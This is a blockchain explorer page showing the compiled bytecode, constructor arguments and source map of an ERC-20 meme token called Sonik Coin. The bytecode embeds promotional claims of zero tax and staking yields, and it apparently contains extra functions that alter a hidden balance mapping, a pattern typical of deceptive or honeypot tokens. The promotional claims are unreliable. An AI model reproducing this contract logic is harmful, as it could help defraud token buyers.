610a4a81604051806060016040528060268152602001610d49602691396001600160a01b0386166000908152600660205260409020549190610b9e565b6001600160a01b038416600090815260066020526040902055610abf565b610aa581604051806060016040528060268152602001610d49602691396001600160a01b0386166000908152600460205260409020549190610b9e565b6001600160a01b0384166000908152600460205260409020555b6001600160a01b038216600090815260046020526040902054610ae29082610c35565b6001600160a01b038316600090815260046020908152604091829020929092558051828152601c928101929092527f4861727279506f747465724f62616d614d6567614d616e39496e752e000000008282015251600080516020610dfb8339815191529181900360600190a1816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a3505050565b60008184841115610c2d5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610bf2578181015183820152602001610bda565b50505050905090810190601f168015610c1f5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610c8f576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b600081610ca557506000610433565b5090919050565b60006001600160a01b038316610cc3575080610433565b5091905056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735468652048504f4d394920736d61727420636f6e747261637420686173203020746178206f6e20616c6c206275797320616e642073656c6c732e45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365536f6e696b20436f696e206973206e6f7420616666696c6961746564207769746820536f6e696320546865204865646765686f672c20536567612c206f7220616e79206f6620697473206173736f6369617465642070726f647563747320616e642069732073696d706c792061207374616e64616c6f6e652c20617765736f6d65206d656d6520636f696e2ecf34ef537ac33ee1ac626ca1587a0a7e8e51561e5514f8cb36afa1c5102b3bab45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655354414b452d322d535045454420796f757220536f6e696b20746f6b656e73207769746820696d7072657373697665204150592520746f206561726e2e45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573737768696c652070726f766964696e6720536f6e696b20656e6f75676820424f4f535420746f20726561636820746865204d4f4f4e2145524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220920dc4ca19c823dce73dce81287512a7b1fbf5b1ce8066c1a310fa2ee2dc1eee64736f6c63430007060033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000001501148210500210001a428c28ccd51819d885b000000001c717cde3c430a0f4171936961753b210a41a47dce8ecf5589ff9e5b

-----Decoded View---------------
Arg [0] : maxVals (uint256): 7494555839788035567044608369375927355844692059
Arg [1] : minVals (uint256): 2995430325775615476918841995764330450236814273300872947527332109915

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 00000000000000000000000001501148210500210001a428c28ccd51819d885b
Arg [1] : 000000001c717cde3c430a0f4171936961753b210a41a47dce8ecf5589ff9e5b


Deployed Bytecode Sourcemap

8755:10377:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10857:94;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12148:193;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12148:193:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;11015:102;;;:::i;:::-;;;;;;;;;;;;;;;;12812:444;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;12812:444:0;;;;;;;;;;;;;;;;;:::i;10545:86::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;13664:281;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;13664:281:0;;;;;;;;:::i;11179:162::-;;;;;;;;;;;;;;;;-1:-1:-1;11179:162:0;-1:-1:-1;;;;;11179:162:0;;:::i;10170:146::-;;;:::i;:::-;;10397:81;;;:::i;:::-;;;;-1:-1:-1;;;;;10397:81:0;;;;;;;;;;;;;;10696:98;;;:::i;14447:381::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;14447:381:0;;;;;;;;:::i;11553:199::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11553:199:0;;;;;;;;:::i;17114:341::-;;;;;;;;;;;;;;;;-1:-1:-1;17114:341:0;;;;;;;:::i;16212:188::-;;;:::i;16470:636::-;;;;;;;;;;;;;;;;-1:-1:-1;16470:636:0;;;;;;;:::i;11814:188::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;11814:188:0;;;;;;;;;;:::i;10857:94::-;10938:5;10931:12;;;;;;;;-1:-1:-1;;10931:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10905:13;;10931:12;;10938:5;;10931:12;;10938:5;10931:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10857:94;:::o;12148:193::-;12252:4;12274:37;12283:10;12295:7;12304:6;12274:8;:37::i;:::-;-1:-1:-1;12329:4:0;12148:193;;;;;:::o;11015:102::-;11097:12;;11015:102;:::o;12812:444::-;12946:4;12963:36;12973:6;12981:9;12992:6;12963:9;:36::i;:::-;13010:216;13033:6;13054:10;13079:136;13133:6;13079:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13079:19:0;;;;;;:11;:19;;;;;;;;13099:10;13079:31;;;;;;;;;:136;:35;:136::i;:::-;13010:8;:216::i;:::-;-1:-1:-1;13244:4:0;12812:444;;;;;:::o;10545:86::-;10622:1;10545:86;:::o;13664:281::-;13809:10;13764:4;13856:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;13856:32:0;;;;;;;;;;13764:4;;13786:129;;13834:7;;13856:48;;13893:10;13856:36;:48::i;11179:162::-;-1:-1:-1;;;;;11315:18:0;11283:7;11315:18;;;:9;:18;;;;;;;11179:162::o;10170:146::-;9797:6;;-1:-1:-1;;;;;9797:6:0;9783:10;:20;9775:65;;;;;-1:-1:-1;;;9775:65:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10229:6:::1;:19:::0;;-1:-1:-1;;;;;;10229:19:0::1;::::0;;10264:44:::1;::::0;10246:1:::1;::::0;10285:10:::1;::::0;10264:44:::1;::::0;10246:1;;10264:44:::1;10170:146::o:0;10397:81::-;10464:6;;-1:-1:-1;;;;;10464:6:0;10397:81;:::o;10696:98::-;10779:7;10772:14;;;;;;;;-1:-1:-1;;10772:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10746:13;;10772:14;;10779:7;;10772:14;;10779:7;10772:14;;;;;;;;;;;;;;;;;;;;;;;;14447:381;14552:4;14574:224;14597:10;14622:7;14644:143;14699:15;14644:143;;;;;;;;;;;;;;;;;14656:10;14644:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;14644:32:0;;;;;;;;;;;:143;:36;:143::i;11553:199::-;11660:4;11682:40;11692:10;11704:9;11715:6;11682:9;:40::i;17114:341::-;17199:10;:8;:10::i;:::-;17194:24;;17211:7;;17194:24;17270:6;17228:3;:39;17240:25;17253:7;17262:2;17240:12;:25::i;:::-;-1:-1:-1;;;;;17228:39:0;-1:-1:-1;;;;;17228:39:0;;;;;;;;;;;;:48;;;;-1:-1:-1;;;;;;;;;;;17292:147:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17114:341;;;:::o;16212:188::-;16345:10;16286:8;16329:36;16370:8;16328:64;16212:188;:::o;16470:636::-;16545:13;16561:7;16545:23;;-1:-1:-1;;;;;;;;;;;16584:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;16668:60:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16754:6;16776:10;:8;:10::i;:::-;16771:24;;16788:7;;;;16771:24;16915:28;16934:1;16938:4;16915:10;:28::i;:::-;16805:9;:106;16864:22;16877:5;16884:1;16864:12;:22::i;:::-;-1:-1:-1;;;;;16805:106:0;-1:-1:-1;;;;;16805:106:0;;;;;;;;;;;;:139;;;;16955:9;16967:4;16955:16;;-1:-1:-1;;;;;;;;;;;16987:65:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17067:14;;17063:27;;17083:7;;;;;17063:27;16470:636;;;;;:::o;11814:188::-;-1:-1:-1;;;;;11966:19:0;;;11934:7;11966:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;11814:188::o;18452:374::-;-1:-1:-1;;;;;18581:20:0;;18573:69;;;;-1:-1:-1;;;18573:69:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18661:21:0;;18653:68;;;;-1:-1:-1;;;18653:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;18732:19:0;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;:37;;;18785:33;;;;;;;;;;;;;;;;;18452:374;;;:::o;15318:820::-;-1:-1:-1;;;;;15450:20:0;;15442:70;;;;-1:-1:-1;;;15442:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15531:23:0;;15523:71;;;;-1:-1:-1;;;15523:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15618:11:0;;15632:1;15618:11;;;:3;:11;;;;;;:15;15614:349;;15664:114;15698:6;15664:114;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15664:11:0;;;;;;:3;:11;;;;;;;:114;:15;:114::i;:::-;-1:-1:-1;;;;;15650:11:0;;;;;;:3;:11;;;;;:128;15614:349;;;15831:120;15871:6;15831:120;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15831:17:0;;;;;;:9;:17;;;;;;;:120;:21;:120::i;:::-;-1:-1:-1;;;;;15811:17:0;;;;;;:9;:17;;;;;:140;15614:349;-1:-1:-1;;;;;15996:20:0;;;;;;:9;:20;;;;;;:32;;16021:6;15996:24;:32::i;:::-;-1:-1:-1;;;;;15973:20:0;;;;;;:9;:20;;;;;;;;;:55;;;;16044:35;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;;;;;;16044:35:0;;;;;;;;16112:9;-1:-1:-1;;;;;16095:35:0;16104:6;-1:-1:-1;;;;;16095:35:0;;16123:6;16095:35;;;;;;;;;;;;;;;;;;15318:820;;;:::o;4971:224::-;5091:7;5127:12;5119:6;;;;5111:29;;;;-1:-1:-1;;;5111:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;5163:5:0;;;4971:224::o;4086:179::-;4144:7;4176:5;;;4200:6;;;;4192:46;;;;;-1:-1:-1;;;4192:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;4256:1;4086:179;-1:-1:-1;;;4086:179:0:o;17802:210::-;17901:7;17930:13;17926:27;;-1:-1:-1;17952:1:0;17945:8;;17926:27;-1:-1:-1;17989:4:0;;17802:210;-1:-1:-1;17802:210:0:o;17527:267::-;17630:7;-1:-1:-1;;;;;17659:24:0;;17655:86;;-1:-1:-1;17707:8:0;17700:29;;17655:86;-1:-1:-1;17768:8:0;17527:267;-1:-1:-1;17527:267:0:o

Swarm Source

ipfs://920dc4ca19c823dce73dce81287512a7b1fbf5b1ce8066c1a310fa2ee2dc1eee
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.